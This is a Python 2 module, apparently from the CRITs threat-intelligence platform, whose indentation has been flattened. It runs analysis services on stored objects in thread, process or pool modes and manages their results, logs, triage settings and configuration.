service = CRITsService.objects(name=name).first()
if not service:
result['html'] = "Unable to find service in database."
return result
# See if the object is a supported type for the service.
if not service_class.supported_for_type(type_):
result['html'] = "Service not supported for type '%s'" % type_
return result
# When running in threaded mode, each thread needs to have its own copy of
# the object. If we do not do this then one thread may read() from the
# object (to get the binary) and then the second would would read() without
# knowing and get undefined behavior as the file pointer would be who knows
# where. By giving each thread a local copy they can operate independently.
#
# When not running in thread mode this has no effect except wasted memory.
local_obj = local()
local_obj.obj = copy.deepcopy(obj)
# Give the service a chance to check for required fields.
try:
service_class.valid_for(local_obj.obj)
if hasattr(local_obj.obj, 'filedata'):
if local_obj.obj.filedata.grid_id:
# Reset back to the start so the service gets the full file.
local_obj.obj.filedata.seek(0)
except ServiceConfigError as e:
result['html'] = str(e)
return result
# Get the config from the database and validate the submitted options
# exist.
db_config = service.config.to_dict()
try:
service_class.validate_runtime(custom_config, db_config)
except ServiceConfigError as e:
result['html'] = str(e)
return result
final_config = db_config
# Merge the submitted config with the one from the database.
# This is because not all config options may be submitted.
final_config.update(custom_config)
form = service_class.bind_runtime_form(user, final_config)
if form:
if not form.is_valid():
# TODO: return corrected form via AJAX
result['html'] = str(form.errors)
return result
# If the form is valid, create the config using the cleaned data.
final_config = db_config
final_config.update(form.cleaned_data)
logger.info("Running %s on %s, execute=%s" % (name, local_obj.obj.id, execute))
service_instance = service_class(notify=update_analysis_results,
complete=finish_task)
# Determine if this service is being run via triage
if is_triage_run:
service_instance.is_triage_run = True
# Give the service a chance to modify the config that gets saved to the DB.
saved_config = dict(final_config)
service_class.save_runtime_config(saved_config)
task = AnalysisTask(local_obj.obj, service_instance, user)
task.config = AnalysisConfig(**saved_config)
task.start()
add_task(task)
service_instance.set_task(task)
if execute == 'process':
p = Process(target=service_instance.execute, args=(final_config,))
p.start()
elif execute == 'thread':
t = Thread(target=service_instance.execute, args=(final_config,))
t.start()
elif execute == 'process_pool':
if __service_process_pool__ is not None and service.compatability_mode != True:
__service_process_pool__.apply_async(func=service_work_handler,
args=(service_instance, final_config,))
else:
logger.warning("Could not run %s on %s, execute=%s, running in process mode" % (name, local_obj.obj.id, execute))
p = Process(target=service_instance.execute, args=(final_config,))
p.start()
elif execute == 'thread_pool':
if __service_thread_pool__ is not None and service.compatability_mode != True:
__service_thread_pool__.apply_async(func=service_work_handler,
args=(service_instance, final_config,))
else:
logger.warning("Could not run %s on %s, execute=%s, running in thread mode" % (name, local_obj.obj.id, execute))
t = Thread(target=service_instance.execute, args=(final_config,))
t.start()
elif execute == 'local':
service_instance.execute(final_config)
# Return after starting thread so web request can complete.
result['success'] = True
return result
def add_task(task):
"""
Add a new task.
"""
logger.debug("Adding task %s" % task)
insert_analysis_results(task)
def run_triage(obj, user):
"""
Run all services marked as triage against this top-level object.
:param obj: The CRITs top-level object class.
:type obj: Class which inherits from
:class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param user: The user requesting the services to be run.
:type user: str
"""
services = triage_services()
for service_name in services:
try:
run_service(service_name,
obj._meta['crits_type'],
obj.id,
user,
obj=obj,
execute=settings.SERVICE_MODEL,
custom_config={},
is_triage_run=True)
except:
pass
return
def add_result(object_type, object_id, analysis_id, result, type_, subtype,
analyst):
"""
add_results wrapper for a single result.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param result: The result to append.
:type result: str
:param type_: The result type.
:type type_: str
:param subtype: The result subtype.
:type subtype: str
:param analyst: The user updating the results.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
return add_results(object_type, object_id, analysis_id, [result], [type_],
[subtype], analyst)
def add_results(object_type, object_id, analysis_id, result, type_, subtype,
analyst):
"""
Add multiple results to an analysis task.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param result: The list of result to append.
:type result: list of str
:param type_: The list of result types.
:type type_: list of str
:param subtype: The list of result subtypes.
:type subtype: list of str
:param analyst: The user updating the results.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
res = {'success': False}
if not object_type or not object_id or not analysis_id:
res['message'] = "Must supply object id/type and analysis id."
return res
# Validate user can add service results to this TLO.
klass = class_from_type(object_type)
sources = user_sources(analyst)
obj = klass.objects(id=object_id, source__name__in=sources).first()
if not obj:
res['message'] = "Could not find object to add results to."
return res
if not(result and type_ and subtype):
res['message'] = "Need a result, type, and subtype to add a result."
return res
if not(len(result) == len(type_) == len(subtype)):
res['message'] = "result, type, and subtype need to be the same length."
return res
# Update analysis results
final_list = []
for key, r in enumerate(result):
final = {}
final['subtype'] = subtype[key]
final['result'] = r
tmp = ast.literal_eval(type_[key])
for k in tmp:
final[k] = tmp[k]
final_list.append(final)
ar = AnalysisResult.objects(analysis_id=analysis_id).first()
if ar:
AnalysisResult.objects(id=ar.id).update_one(push_all__results=final_list)
res['success'] = True
return res
def add_log(object_type, object_id, analysis_id, log_message, level, analyst):
"""
Add a log entry to an analysis task.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param log_message: The log entry to append.
:type log_message: dict
:param level: The log level.
:type level: str
:param analyst: The user updating the log.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
results = {'success': False}
if not object_type or not object_id or not analysis_id:
results['message'] = "Must supply object id/type and analysis id."
return results
# Validate user can add service results to this TLO.
klass = class_from_type(object_type)
sources = user_sources(analyst)
obj = klass.objects(id=object_id, source__name__in=sources).first()
if not obj:
results['message'] = "Could not find object to add results to."
return results
# Update analysis log
le = EmbeddedAnalysisResultLog()
le.message = log_message
le.level = level
le.datetime = str(datetime.datetime.now())
ar = AnalysisResult.objects(analysis_id=analysis_id).first()
if ar:
AnalysisResult.objects(id=ar.id).update_one(push__log=le)
results['success'] = True
else:
results['message'] = "Could not find task to add log to."
return results
def finish_task(object_type, object_id, analysis_id, status, analyst):
"""
Finish a task by setting its status to "completed" and setting the finish
date.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param status: The status of the task.
:type status: str ("error", "completed")
:param analyst: The user updating the log.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
results = {'success': False}
if not status:
status = "completed"
if status not in ('error', 'completed'):
status = "completed"
if not object_type or not object_id or not analysis_id:
results['message'] = "Must supply object id/type and analysis id."
return results
# Validate user can add service results to this TLO.
klass = class_from_type(object_type)
params = {'id': object_id}
if hasattr(klass, 'source'):
params['source__name__in'] = user_sources(analyst)
obj = klass.objects(**params).first()
if not obj:
results['message'] = "Could not find object to add results to."
return results
# Update analysis log
date = str(datetime.datetime.now())
ar = AnalysisResult.objects(analysis_id=analysis_id).first()
if ar:
AnalysisResult.objects(id=ar.id).update_one(set__status=status,
set__finish_date=date)
results['success'] = True
return results
def update_config(service_name, config, analyst):
"""
Update the configuration for a service.
"""
service = CRITsService.objects(name=service_name).first()
service.config = AnalysisConfig(**config)
try:
#TODO: get/validate the config from service author to set status
#update_status(service_name)
service.save(username=analyst)
return {'success': True}
except ValidationError, e:
return {'success': False, 'message': e}
def get_service_config(name):
status = {'success': False}
service = CRITsService.objects(name=name, status__ne="unavailable").first()
if not service:
status['error'] = 'Service "%s" is unavailable. Please review error logs.' % name
return status
config = service.config.to_dict()
service_class = crits.services.manager.get_service_class(name)
if not service_class:
status['error'] = 'Service "%s" is unavilable. Please review error logs.' % name
return status
display_config = service_class.get_config_details(config)
status['config'] = display_config
status['config_error'] = _get_config_error(service)
# TODO: fix code so we don't have to do this
status['service'] = service.to_dict()
status['success'] = True
return status
def _get_config_error(service):
"""
Return a string describing the error in the service configuration.
Returns None if there are no errors.
"""
error = None
name = service['name']
config = service['config']
if service['status'] == 'misconfigured':
service_class = crits.services.manager.get_service_class(name)
try:
service_class.parse_config(config.to_dict())
except Exception as e:
error = str(e)
return error
def do_edit_config(name, analyst, post_data=None):
status = {'success': False}
service = CRITsService.objects(name=name, status__ne="unavailable").first()
if not service:
status['config_error'] = 'Service "%s" is unavailable. Please review error logs.' % name
status['form'] = ''
status['service'] = ''
return status
# Get the class that implements this service.
service_class = crits.services.manager.get_service_class(name)
config = service.config.to_dict()
cfg_form, html = service_class.generate_config_form(config)
# This isn't a form object. It's the HTML.
status['form'] = html
status['service'] = service
if post_data:
#Populate the form with values from the POST request
form = cfg_form(post_data)
if form.is_valid():
try:
service_class.parse_config(form.cleaned_data)
except ServiceConfigError as e:
service.status = 'misconfigured'
service.save()
status['config_error'] = str(e)
return status
result = update_config(name, form.cleaned_data, analyst)
if not result['success']:
return status
service.status = 'available'
service.save()
else:
status['config_error'] = form.errors
return status
status['success'] = True
return status
def get_config(service_name):
"""
Get the configuration for a service.
"""
service = CRITsService.objects(name=service_name).first()
if not service:
return None
return service.config
def set_enabled(service_name, enabled=True, analyst=None):
"""
Enable/disable a service in CRITs.
"""
if enabled:
logger.info("Enabling: %s" % service_name)
else:
logger.info("Disabling: %s" % service_name)
service = CRITsService.objects(name=service_name).first()
service.enabled = enabled
try:
service.save(username=analyst)
if enabled:
url = reverse('crits.services.views.disable', args=(service_name,))
else:
url = reverse('crits.services.views.enable', args=(service_name,))
return {'success': True, 'url': url}
except ValidationError, e:
return {'success': False, 'message': e}
def set_triage(service_name, enabled=True, analyst=None):
"""
Enable/disable a service for running on triage (upload).
"""
if enabled:
logger.info("Enabling triage: %s" % service_name)
else:
logger.info("Disabling triage: %s" % service_name)
service = CRITsService.objects(name=service_name).first()
service.run_on_triage = enabled
try:
service.save(username=analyst)
if enabled:
url = reverse('crits.services.views.disable_triage',
args=(service_name,))
else:
url = reverse('crits.services.views.enable_triage',
args=(service_name,))
return {'success': True, 'url': url}
except ValidationError, e:
return {'success': False,
'message': e}
def enabled_services(status=True):
"""
Return names of services which are enabled.
"""
if status:
services = CRITsService.objects(enabled=True,
status="available")
else:
services = CRITsService.objects(enabled=True)
return [s.name for s in services]
def get_supported_services(crits_type):
"""
Get the supported services for a type.
"""
services = CRITsService.objects(enabled=True)
for s in sorted(services, key=lambda s: s.name.lower()):
if s.supported_types == 'all' or crits_type in s.supported_types:
yield s.name
def triage_services(status=True):
"""
Return names of services set to run on triage.
"""
if status:
services = CRITsService.objects(run_on_triage=True,
status="available")
else:
services = CRITsService.objects(run_on_triage=True)
return [s.name for s in services]
def delete_analysis(task_id, analyst):
"""
Delete analysis results.
"""
ar = AnalysisResult.objects(id=task_id).first()
if ar:
ar.delete(username=analyst)
def insert_analysis_results(task):
"""
Insert analysis results for this task.
"""
ar = AnalysisResult()
tdict = task.to_dict()
tdict['analysis_id'] = tdict['id']
del tdict['id']
ar.merge(arg_dict=tdict)
ar.save()
def update_analysis_results(task):
"""
Update analysis results for this task.
"""
# If the task does not currently exist for the given sample in the
# database, add it.
found = False
ar = AnalysisResult.objects(analysis_id=task.task_id).first()
if ar:
found = True
if not found:
logger.warning("Tried to update a task that didn't exist.")
insert_analysis_results(task)
else:
# Otherwise, update it.
tdict = task.to_dict()
tdict['analysis_id'] = tdict['id']
del tdict['id']
#TODO: find a better way to do this.
new_dict = {}
for k in tdict.iterkeys():
new_dict['set__%s' % k] = tdict[k]
try:
AnalysisResult.objects(id=ar.id).update_one(**new_dict)
except Exception as e: # assume bad data in 'results'
task.status = 'error'
new_dict['set__results'] = []
le = EmbeddedAnalysisResultLog()
le.message = 'DB Update Failed: %s' % e
le.level = 'error'
le.datetime = str(datetime.datetime.now())
new_dict['set__log'].append(le)
try:
AnalysisResult.objects(id=ar.id).update_one(**new_dict)
except: # don't know what's wrong, try writing basic log only
AnalysisResult.objects(id=ar.id).update_one(set__log=[le])
# The service pools need to be defined down here because the functions
# that are used by the services must already be defined.
if settings.SERVICE_MODEL == 'thread_pool':
__service_thread_pool__ = ThreadPool(processes=settings.SERVICE_POOL_SIZE)
__service_process_pool__ = None
elif settings.SERVICE_MODEL == 'process_pool':
__service_thread_pool__ = None
__service_process_pool__ = Pool(processes=settings.SERVICE_POOL_SIZE)
else:
__service_thread_pool__ = None
__service_process_pool__ = None
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.